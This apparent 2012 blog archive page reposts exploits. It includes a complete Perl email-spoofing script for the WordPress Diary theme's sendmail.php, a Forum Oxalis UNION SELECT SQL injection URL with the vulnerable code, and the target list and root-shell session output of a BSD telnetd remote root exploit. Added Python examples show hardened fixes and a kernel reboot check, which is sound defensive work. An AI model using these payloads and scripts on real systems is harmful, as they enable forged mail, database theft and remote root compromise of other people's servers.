Archive for 17 July 2012

The WordPress Diary/Notebook theme has a flaw in 'wp-content/themes/diary/sendmail.php' that allows email spoofing with the Perl exploit below. Because the recipient, the sender address and the message body are all taken from the POST parameters (the recipient merely hex-encoded), the script can be used to send mail to any address with a forged sender.

#!/usr/bin/perl
# Exploit Title: Diary/Notebook Site5 WordPress Theme - Email Spoofing
# Date: 15.07.2012
# Exploit Author:
# Discovered by: (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/)
# Software Link: http://www.wpdiarytheme.com/
# Vendor Homepage: http://www.site5.com/
# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/
# Version: Not Documented
# Tested on: Linux 3.2

use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common qw{ POST };

# Change this to the root of the WordPress install
my $wordpress = 'http://localhost/wordpress/';
my $url = $wordpress . 'wp-content/themes/diary/sendmail.php';

# Name shows up in the subject of the email ("Website contact message from <name>")
my $name = 'Proof of Concept';

# Sender email address (any value is accepted, which is the spoofing)
my $email = '';

# Content of the email
my $comment = 'Email content';

# Receiver email address; sendmail.php expects it hex-encoded, one "%x" per byte
my $receiver = '';
$receiver =~ s/(.)/sprintf("%x", ord($1))/eg;

my $ua = LWP::UserAgent->new();
my $request = POST($url, [
    name     => $name,
    email    => $email,
    comment  => $comment,
    receiver => $receiver,
    submit   => 'submit',
]);

print "Sending request to $url\n";
my $content = $ua->request($request)->as_string();
print $content;
print "\nDone\nFollow \ on Twitter\n";
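The following is an added example and not the theme's code nor part of the original post. It models the POST body the Perl script above builds (same field names, same per-byte hex encoding of the recipient) and contrasts a mail handler that takes the recipient from the request, which is the behaviour the PoC relies on and is assumed here because the page does not show sendmail.php itself, with a hardened handler that only ever mails a server-side configured address. The addresses SITE_OWNER and SITE_SENDER are hypothetical.

```python
# Added example (not the theme's sendmail.php): the request the PoC sends, the assumed
# vulnerable handling, and the hardened handling that removes the spoofing/relay problem.
import re
from email.message import EmailMessage

EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")
SITE_OWNER = "owner@example.com"      # hypothetical: the only address the form should reach
SITE_SENDER = "noreply@example.com"   # hypothetical: a From address the site controls


def encode_receiver(addr: str) -> str:
    """Hex-encode each byte the way the Perl PoC does: s/(.)/sprintf("%x", ord($1))/eg."""
    return "".join(f"{b:x}" for b in addr.encode("ascii"))


def decode_receiver(hexstr: str) -> str:
    """The inverse; what the server must be doing with the "receiver" field (assumption)."""
    return bytes.fromhex(hexstr).decode("ascii")


def poc_form(name: str, email: str, comment: str, receiver: str) -> dict:
    """The POST body the Perl script builds (constructed sample with its field names)."""
    return {"name": name, "email": email, "comment": comment,
            "receiver": encode_receiver(receiver), "submit": "submit"}


def build_message_vulnerable(form: dict) -> EmailMessage:
    """Assumed vulnerable behaviour: From, To and body all come from the client, so the
    site becomes an open relay for forged mail to any address."""
    msg = EmailMessage()
    msg["From"] = form["email"]
    msg["To"] = decode_receiver(form["receiver"])
    msg["Subject"] = f"Website contact message from {form['name']}"
    msg.set_content(form["comment"])
    return msg


def build_message_hardened(form: dict) -> EmailMessage:
    """Hardened: recipient and From are fixed server-side, the visitor's address only goes
    into Reply-To after a syntax check, and CR/LF are refused in the name (header injection).
    Any client-supplied "receiver" field is ignored entirely."""
    name, email = form.get("name", ""), form.get("email", "")
    if not EMAIL_RE.match(email):
        raise ValueError("invalid sender address")
    if "\r" in name or "\n" in name:
        raise ValueError("newline in name")
    msg = EmailMessage()
    msg["From"] = SITE_SENDER
    msg["To"] = SITE_OWNER
    msg["Reply-To"] = email
    msg["Subject"] = f"Website contact message from {name}"
    msg.set_content(form.get("comment", ""))
    return msg


if __name__ == "__main__":
    form = poc_form("Proof of Concept", "ceo@example.com", "Email content", "victim@example.net")
    print(form["receiver"])                      # hex string, as the Perl script sends it
    print(build_message_vulnerable(form)["To"])  # attacker-chosen recipient
    print(build_message_hardened(form)["To"])    # always SITE_OWNER
```

The point of the hardened version is that no request field is allowed to choose where the mail goes or whom it claims to be from; the visitor's address is demoted to Reply-To, which keeps the contact form usable without letting it relay.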

Forum Oxalis <= 0.1.2 SQL Injection Vulnerability

The SQL injection vulnerability in Forum Oxalis 0.1.2 carries a high risk. The flaw in func.php allows data to be pulled out of the database. Anyone running this script should fix the hole as soon as possible.

#################################################

Forum Oxalis 0.1.2

#################################################

Discovered by: Jean Pascal Pereira

Vendor information:

"Forum Oxalis is a minimalist GPL PHP forum using CSS."

Vendor URI: http://developer.berlios.de/projects/forumoxalis/

#################################################

Risk-level: High

The application is prone to a remote SQL injection vulnerability.

————————————-

func.php, line 72:

function lister_messages($id, $page, $parpage)
{
    global $mysql_table;
    $resu = mysql_query("select * from `$mysql_table` where id=$id");
    $nombre_messages = mysql_num_rows($resu);

forum.php, line 7:

$id = $_GET['id'];

forum.php, line 74:

case "message":
    lister_messages($id, $page, $reponses_par_page);
    $reponse_a_id = $id;
    break;

————————————-

Exploit / Proof Of Concept:

http://localhost/ForumOxalis/index.php?id=99999/**/UNION/**/SELECT/**/0x00,version(),0x00,0x00,0x00,0x00,0x00,0x00,0x00&action=message

————————————-

Solution:

Do some input validation.

————————————-

#################################################
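The following is an added example, not Forum Oxalis code. It reproduces the string interpolation on func.php line 72 against an in-memory SQLite table so that the UNION SELECT from the PoC can be run offline, and puts the validated, parameterised query that closes the hole next to it. SQLite's sqlite_version() stands in for MySQL's version(); the table name, the nine-column layout and the sample row are constructed, and the hex literals 0x00 are kept from the PoC.

```python
# Added example (not the forum's code): the vulnerable interpolation from func.php line 72
# next to the "input validation" fix the advisory asks for, exercised with the PoC payload.
import re
import sqlite3

MYSQL_TABLE = "messages"   # stands in for the $mysql_table global (constructed)

# The PoC payload with sqlite_version() in place of MySQL's version()
PAYLOAD = "99999/**/UNION/**/SELECT/**/0x00,sqlite_version(),0x00,0x00,0x00,0x00,0x00,0x00,0x00"


def build_query_vulnerable(table: str, id_param: str) -> str:
    """Exactly the string mysql_query("select * from `$mysql_table` where id=$id") receives."""
    return f"select * from `{table}` where id={id_param}"


def setup_db() -> sqlite3.Connection:
    """Constructed schema with nine columns, matching the nine values the PoC UNIONs in."""
    con = sqlite3.connect(":memory:")
    con.execute("create table messages (id integer, author, title, body, c5, c6, c7, c8, c9)")
    con.execute("insert into messages values (1, 'alice', 'hello', 'first post', 0, 0, 0, 0, 0)")
    return con


def run_vulnerable(con: sqlite3.Connection, id_param: str) -> list:
    """$_GET['id'] goes straight into the SQL text, so the UNION is executed."""
    return con.execute(build_query_vulnerable(MYSQL_TABLE, id_param)).fetchall()


def validate_id(id_param: str) -> int:
    """The validation the advisory calls for: a message id is an unsigned decimal integer,
    anything else is rejected before it can reach the SQL layer."""
    if not re.fullmatch(r"[0-9]+", id_param):
        raise ValueError(f"rejected id parameter: {id_param!r}")
    return int(id_param)


def run_hardened(con: sqlite3.Connection, id_param: str) -> list:
    """Validated integer bound as a parameter; the table name stays a server-side constant."""
    return con.execute(f"select * from `{MYSQL_TABLE}` where id=?",
                       (validate_id(id_param),)).fetchall()


if __name__ == "__main__":
    con = setup_db()
    print(build_query_vulnerable(MYSQL_TABLE, PAYLOAD))
    print(run_vulnerable(con, PAYLOAD))   # one row whose second column is the DB version
    try:
        run_hardened(con, PAYLOAD)
    except ValueError as err:
        print(err)
    print(run_hardened(con, "1"))
```

Binding the id as a parameter is what stops the injection; the integer check on top of it is cheap and gives a clean rejection instead of a database error, which is also where a log entry for an attempted injection belongs.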


Linux Kernel x86_64 Local Root Exploit

As is well known, the Linux kernel 2.6.18.x x86_64 exploit was published as a 0day by kingcope in July 2010, and a very large number of hosting providers were affected by it. Hosting providers that have not applied the 2012 x86_64 patches are still affected, though fewer of them.

Around the same time, the local root exploit released for the Linux kernel 2.6.32.x series was just as effective, and local root exploits also wreaked havoc on Ubuntu releases.

For two years no Linux kernel local root exploits as effective as those released in 2008, 2009 and 2010 have been made public. Over those two years, effort appears to have shifted towards Windows local and remote exploits.

Although Linux and Windows remote root exploits have taken the place of local root exploits, their impact has diminished considerably.

A local root exploit emerging after this two-year lull would put Linux servers in a very difficult position.

I recommend that Linux hosting providers follow Linux kernel updates closely and keep their kernels up to date at all times.
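One check that belongs with the advice above, added here as an example and not part of the original post: after a kernel package update the new image sits in /boot until the next reboot, so the kernel that is actually running can stay vulnerable long after the package manager reports everything up to date. The script compares the running release with the newest installed image. It assumes the usual /boot/vmlinuz-<release> naming, and its version ordering compares only the numeric fields of the release string, which is stable within one distribution but is not meant for comparing across distributions.

```python
# Added example (not from the post): is the running kernel the newest one installed?
import glob
import os
import re


def version_key(release: str) -> tuple:
    """Comparable key for a release string such as '2.6.32-279.el6.x86_64': only the
    numeric fields are compared (assumption: same distribution, same naming scheme)."""
    return tuple(int(n) for n in re.findall(r"\d+", release))


def newest_installed(releases) -> str:
    """The highest release among the installed kernel images."""
    return max(releases, key=version_key)


def running_is_newest(running: str, installed) -> bool:
    """True when no installed image is newer than the running kernel."""
    return version_key(running) >= version_key(newest_installed(installed))


def installed_kernels_from_boot(boot_dir: str = "/boot") -> list:
    """Release strings taken from /boot/vmlinuz-* (assumed naming)."""
    prefix = "vmlinuz-"
    return [os.path.basename(p)[len(prefix):]
            for p in glob.glob(os.path.join(boot_dir, prefix + "*"))]


def reboot_report(running: str, installed) -> str:
    """One-line verdict used by the command-line entry point below."""
    if not installed:
        return "no vmlinuz-* images found; cannot compare"
    if running_is_newest(running, installed):
        return f"running {running}, which is the newest installed kernel"
    return f"running {running} but {newest_installed(installed)} is installed: reboot needed"


if __name__ == "__main__":
    print(reboot_report(os.uname().release, installed_kernels_from_boot()))
```

A non-zero gap here is the common way a "patched" host stays exploitable: the package is current, the running kernel is not.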

BSD telnetd Remote Root Exploit

BSD telnetd Remote Root Exploit *ZERODAY*

By Kingcope
Year 2011
usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d]
        [-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s src_addr]
        [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name [port]]
TARGETS:
0 FreeBSD 8.2 i386
1 FreeBSD 8.0/8.1/8.2 i386
2 FreeBSD 7.3/7.4 i386
3 FreeBSD 6.2/6.3/6.4 i386
4 FreeBSD 5.3/5.5 i386
5 FreeBSD 4.9/4.11 i386
6 NetBSD 5.0/5.1 i386
7 NetBSD 4.0 i386
8 FreeBSD 8.2 amd64
9 FreeBSD 8.0/8.1 amd64
10 FreeBSD 7.1/7.3/7.4 amd64
11 FreeBSD 7.1 amd64
12 FreeBSD 7.0 amd64
13 FreeBSD 6.4 amd64
14 FreeBSD 6.3 amd64
15 FreeBSD 6.2 amd64
16 FreeBSD 6.1 amd64
17 TESTING i386
18 TESTING amd64
Trying 192.168.2.8...
Connected to 192.168.2.8.
Escape character is '^]'.
Trying SRA secure login:
*** EXPLOITING REMOTE TELNETD
*** by Kingcope
*** Year 2011
USING TARGET -- FreeBSD 8.2 amd64
SC LEN: 30
ALEX-ALEX
6:36PM  up 5 mins, 1 user, load averages: 0.01, 0.15, 0.09
USER             TTY      FROM              LOGIN@  IDLE WHAT
kcope            pts/0    192.168.2.3       6:32PM     4 _su (csh)
FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)